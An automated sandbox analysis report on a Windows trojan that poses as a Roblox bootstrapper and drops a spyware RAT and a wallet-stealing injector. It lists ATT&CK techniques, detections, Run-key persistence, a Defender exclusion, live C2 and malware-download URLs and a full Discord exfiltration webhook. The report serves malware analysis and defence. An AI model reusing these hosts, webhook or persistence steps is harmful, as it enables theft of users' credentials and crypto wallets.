                    Obfuscated Files or Information                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                    Software Packing                    		NTDS341
                    Security Software Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets1
                    Process Discovery                    		SSHKeylogging13
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials151
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                    Masquerading                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                    Virtualization/Sandbox Evasion                    		Proc Filesystem11
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1556022 Sample: 8Hd0ZExgJz.exe Startdate: 14/11/2024 Architecture: WINDOWS Score: 100 78 23.ip.gl.ply.gg 2->78 80 www.nodejs.org 2->80 82 6 other IPs or domains 2->82 96 Found malware configuration 2->96 98 Malicious sample detected (through community Yara rule) 2->98 100 Antivirus detection for URL or domain 2->100 102 22 other signatures 2->102 9 8Hd0ZExgJz.exe 5 2->9         started        12 Windows Security Host.exe 2->12         started        14 Windows Security Host.exe 2->14         started        signatures3 process4 file5 60 C:\Users\user\...\Windows Security Host.exe, PE32 9->60 dropped 62 C:\Users\user\AppData\Local\...\Injector.exe, PE32 9->62 dropped 64 C:\Users\user\...\BootstrapperV1.23.exe, PE32+ 9->64 dropped 66 C:\Users\user\AppData\...\8Hd0ZExgJz.exe.log, CSV 9->66 dropped 16 Windows Security Host.exe 1 6 9->16         started        21 BootstrapperV1.23.exe 14 8 9->21         started        23 Injector.exe 14 3 9->23         started        process6 dnsIp7 68 23.ip.gl.ply.gg 147.185.221.23, 26848, 49989, 49991 SALSGIVERUS United States 16->68 56 C:\Users\user\Windows Security Host.exe, PE32 16->56 dropped 84 Protects its processes via BreakOnTermination flag 16->84 86 Adds a directory exclusion to Windows Defender 16->86 25 powershell.exe 16->25         started        28 powershell.exe 16->28         started        30 powershell.exe 16->30         started        32 powershell.exe 16->32         started        70 127.0.0.1 unknown unknown 21->70 72 edge-term4-fra2.roblox.com 128.116.123.3, 443, 49704 ROBLOX-PRODUCTIONUS United States 21->72 76 2 other IPs or domains 21->76 58 \Device\ConDrv, ISO-8859 21->58 dropped 88 Multi AV Scanner detection for dropped file 21->88 90 Machine Learning detection for dropped file 21->90 34 cmd.exe 1 21->34         started        36 conhost.exe 21->36         started        38 WerFault.exe 21->38         started        74 ip-api.com 208.95.112.1, 49702, 80 TUT-ASUS United States 23->74 92 Antivirus detection for dropped file 23->92 94 Found many strings related to Crypto-Wallets (likely being stolen) 23->94 40 WMIC.exe 23->40         started        file8 signatures9 process10 signatures11 104 Loading BitLocker PowerShell Module 25->104 42 conhost.exe 25->42         started        44 conhost.exe 28->44         started        46 conhost.exe 30->46         started        48 conhost.exe 32->48         started        106 Uses ipconfig to lookup or modify the Windows network settings 34->106 50 ipconfig.exe 1 34->50         started        52 conhost.exe 34->52         started        54 conhost.exe 40->54         started        process12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    8Hd0ZExgJz.exe61%ReversingLabsByteCode-MSIL.Trojan.XWormRAT
                    8Hd0ZExgJz.exe100%AviraTR/Dropper.Gen
                    8Hd0ZExgJz.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\Windows Security Host.exe100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Local\Temp\Injector.exe100%AviraHEUR/AGEN.1307507
                    C:\Users\user\Windows Security Host.exe100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Local\Temp\Windows Security Host.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\Injector.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe100%Joe Sandbox ML
                    C:\Users\user\Windows Security Host.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe29%ReversingLabsByteCode-MSIL.Trojan.Heracles

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://ion=v4.5vn0%Avira URL Cloudsafe
                    https://discord.com;http://127.0.0.1:6463/rpc?v=110%Avira URL Cloudsafe
                    http://crl.microsP0%Avira URL Cloudsafe
                    http://127.0.0.1:646320%Avira URL Cloudsafe
                    https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip100%Avira URL Cloudmalware
                    https://go.microso0%Avira URL Cloudsafe
                    https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    23.ip.gl.ply.gg
                    		147.185.221.23
                    		truetrue
                      		unknown
                      getsolara.dev
                      		104.21.93.27
                      		truefalse
                        		high
                        edge-term4-fra2.roblox.com
                        		128.116.123.3
                        		truefalse
                          		high
                          www.nodejs.org
                          		104.20.22.46
                          		truefalse
                            		high
                            ip-api.com
                            		208.95.112.1
                            		truefalse
                              		high
                              clientsettings.roblox.com
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msifalse
                                  		high
                                  127.0.0.1false
                                    		high
                                    23.ip.gl.ply.ggfalse
                                      		high
                                      https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SfLuSuU_8R57ng1lqsCx6ofalse
                                        		high
                                        https://getsolara.dev/asset/discord.jsonfalse
                                          		high
                                          https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/livefalse
                                            		high
                                            https://getsolara.dev/api/endpoint.jsonfalse
                                              		high
                                              http://ip-api.com/line/?fields=hostingfalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://127.0.0.1:6463BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.nodejs.orgBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exeBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://crl.microsPBootstrapperV1.23.exe, 00000004.00000002.1620001182.000001EFAF3F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.microsoft.copowershell.exe, 00000010.00000002.1355528661.000001E67BB20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/Licensepowershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://discordapp.com/api/v9/users/Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.drfalse
                                                          		high
                                                          https://ncs.roblox.com/uploadBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CA9000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.nodejs.orgBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SInjector.exe, 00000002.00000002.1312728444.00000242BD751000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://aka.ms/vs/17/release/vc_redist.x64.exeBootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.drfalse
                                                                  		high
                                                                  http://crl.microsopowershell.exe, 0000001E.00000002.1802454253.000001F4EE624000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.1342493602.000001E610071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1449851078.0000019F3D1A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1578820555.00000195A422F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://ip-api.comInjector.exe, 00000002.00000002.1312728444.00000242BD846000.00000004.00000800.00020000.00000000.sdmp, Injector.exe, 00000002.00000002.1312728444.00000242BD85B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ion=v4.5vnpowershell.exe, 0000001C.00000002.1607943237.00000195AC969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://127.0.0.1:6463/rpc?v=1BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInjector.exe, 00000002.00000002.1312728444.00000242BD7DE000.00000004.00000800.00020000.00000000.sdmp, Windows Security Host.exe, 00000003.00000002.2478752394.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96BCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1319923326.000001E600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195941C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D5FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://edge-term4-fra2.roblox.comBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.drfalse
                                                                                  		high
                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.1342493602.000001E610071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1449851078.0000019F3D1A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1578820555.00000195A422F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://discord.comBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://discord.com/api/v10/users/Injector.exe.0.drfalse
                                                                                        		high
                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000010.00000002.1319923326.000001E600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195943E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://contoso.com/Iconpowershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://upx.sf.netAmcache.hve.23.drfalse
                                                                                                  		high
                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://james.newtonking.com/projects/jsonBootstrapperV1.23.exe.0.drfalse
                                                                                                      		high
                                                                                                      http://getsolara.devBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://discord.com;http://127.0.0.1:6463/rpc?v=11BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe.0.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://github.com/Blank-c/Umbral-StealerInjector.exe.0.drfalse
                                                                                                          		high
                                                                                                          https://go.microsopowershell.exe, 0000001E.00000002.1797731442.000001F4EE532000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.jsonBootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.drfalse
                                                                                                            		high
                                                                                                            https://getsolara.devBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96BCD000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.jsonBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe.0.drfalse
                                                                                                                		high
                                                                                                                http://127.0.0.1:64632BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000010.00000002.1319923326.000001E600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195943E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.newtonsoft.com/jsonschemaBootstrapperV1.23.exe.0.drfalse
                                                                                                                    		high
                                                                                                                    https://www.nuget.org/packages/Newtonsoft.Json.BsonBootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe.0.drfalse
                                                                                                                      		high
                                                                                                                      https://aka.ms/pscore68powershell.exe, 00000010.00000002.1319923326.000001E600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195941C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D5FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://clientsettings.roblox.comBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msiBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CA5000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://pastebin.com/raw/pjseRvyKBootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.drfalse
                                                                                                                              		high
                                                                                                                              https://clientsettings.roblox.comBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://ip-api.com/json/?fields=225545Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zipBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  		unknown

                                                                                                                                  World Map of Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public IPs

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  208.95.112.1
                                                                                                                                  		ip-api.comUnited States
                                                                                                                                  		53334TUT-ASUSfalse
                                                                                                                                  128.116.123.3
                                                                                                                                  		edge-term4-fra2.roblox.comUnited States
                                                                                                                                  		22697ROBLOX-PRODUCTIONUSfalse
                                                                                                                                  147.185.221.23
                                                                                                                                  		23.ip.gl.ply.ggUnited States
                                                                                                                                  		12087SALSGIVERUStrue
                                                                                                                                  104.21.93.27
                                                                                                                                  		getsolara.devUnited States
                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                  104.20.22.46
                                                                                                                                  		www.nodejs.orgUnited States
                                                                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                                                                  Private

                                                                                                                                  IP
                                                                                                                                  127.0.0.1

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                  Analysis ID:1556022
                                                                                                                                  Start date and time:2024-11-14 20:13:05 +01:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 8m 5s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:37
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:8Hd0ZExgJz.exe
                                                                                                                                  renamed because original name is a hash value
                                                                                                                                  Original Sample Name:073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@31/33@5/6
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 11.1%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 96%
                                                                                                                                  • Number of executed functions: 235
                                                                                                                                  • Number of non-executed functions: 10
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                  Warnings

                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 142.250.186.131, 52.168.117.173
                                                                                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, gstatic.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                  • Execution Graph export aborted for target 8Hd0ZExgJz.exe, PID 6440 because it is empty
                                                                                                                                  • Execution Graph export aborted for target BootstrapperV1.23.exe, PID 4064 because it is empty
                                                                                                                                  • Execution Graph export aborted for target Injector.exe, PID 2404 because it is empty
                                                                                                                                  • Execution Graph export aborted for target Windows Security Host.exe, PID 1316 because it is empty
                                                                                                                                  • Execution Graph export aborted for target Windows Security Host.exe, PID 608 because it is empty
                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 5112 because it is empty
                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7544 because it is empty
                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7864 because it is empty
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                  • VT rate limit hit for: 8Hd0ZExgJz.exe

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  14:14:02API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                  14:14:04API Interceptor49x Sleep call for process: BootstrapperV1.23.exe modified
                                                                                                                                  14:14:04API Interceptor57x Sleep call for process: powershell.exe modified
                                                                                                                                  15:19:39API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                  15:20:07API Interceptor11921x Sleep call for process: Windows Security Host.exe modified
                                                                                                                                  21:20:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Security Host C:\Users\user\Windows Security Host.exe
                                                                                                                                  21:20:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Security Host C:\Users\user\Windows Security Host.exe
                                                                                                                                  21:20:20AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  208.95.112.1(#U0130TOSAM) 11 KASIM 2024 HAFTALIK EKONOM#U0130 B#U00dcLTEN#U0130.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                  file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                  • ip-api.com/line/
                                                                                                                                  file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                  • ip-api.com/line/
                                                                                                                                  https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • ip-api.com/json
                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                  • ip-api.com/line/
                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • ip-api.com/line/
                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • ip-api.com/line/
                                                                                                                                  x.batGet hashmaliciousUnknownBrowse
                                                                                                                                  • ip-api.com/json/?fields=8195
                                                                                                                                  nuevo orden.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                  transferencia interbancaria_867897870877.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                  128.116.123.3KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                    hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                      SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              SolaraBootstrapper.exeGet hashmaliciousDCRat, XWormBrowse
                                                                                                                                                https://www.roblox.com.zm/loginGet hashmaliciousUnknownBrowse
                                                                                                                                                  RobloxPlayerLauncher.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                    Domains

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    www.nodejs.orgKKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                    • 104.20.23.46
                                                                                                                                                    AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                    • 104.20.23.46
                                                                                                                                                    IM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 104.20.22.46
                                                                                                                                                    SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                    • 104.20.23.46
                                                                                                                                                    cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 104.20.22.46
                                                                                                                                                    oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 104.20.23.46
                                                                                                                                                    hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 104.20.22.46
                                                                                                                                                    8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                                                                                    • 104.20.23.46
                                                                                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.20.22.46
                                                                                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.20.22.46
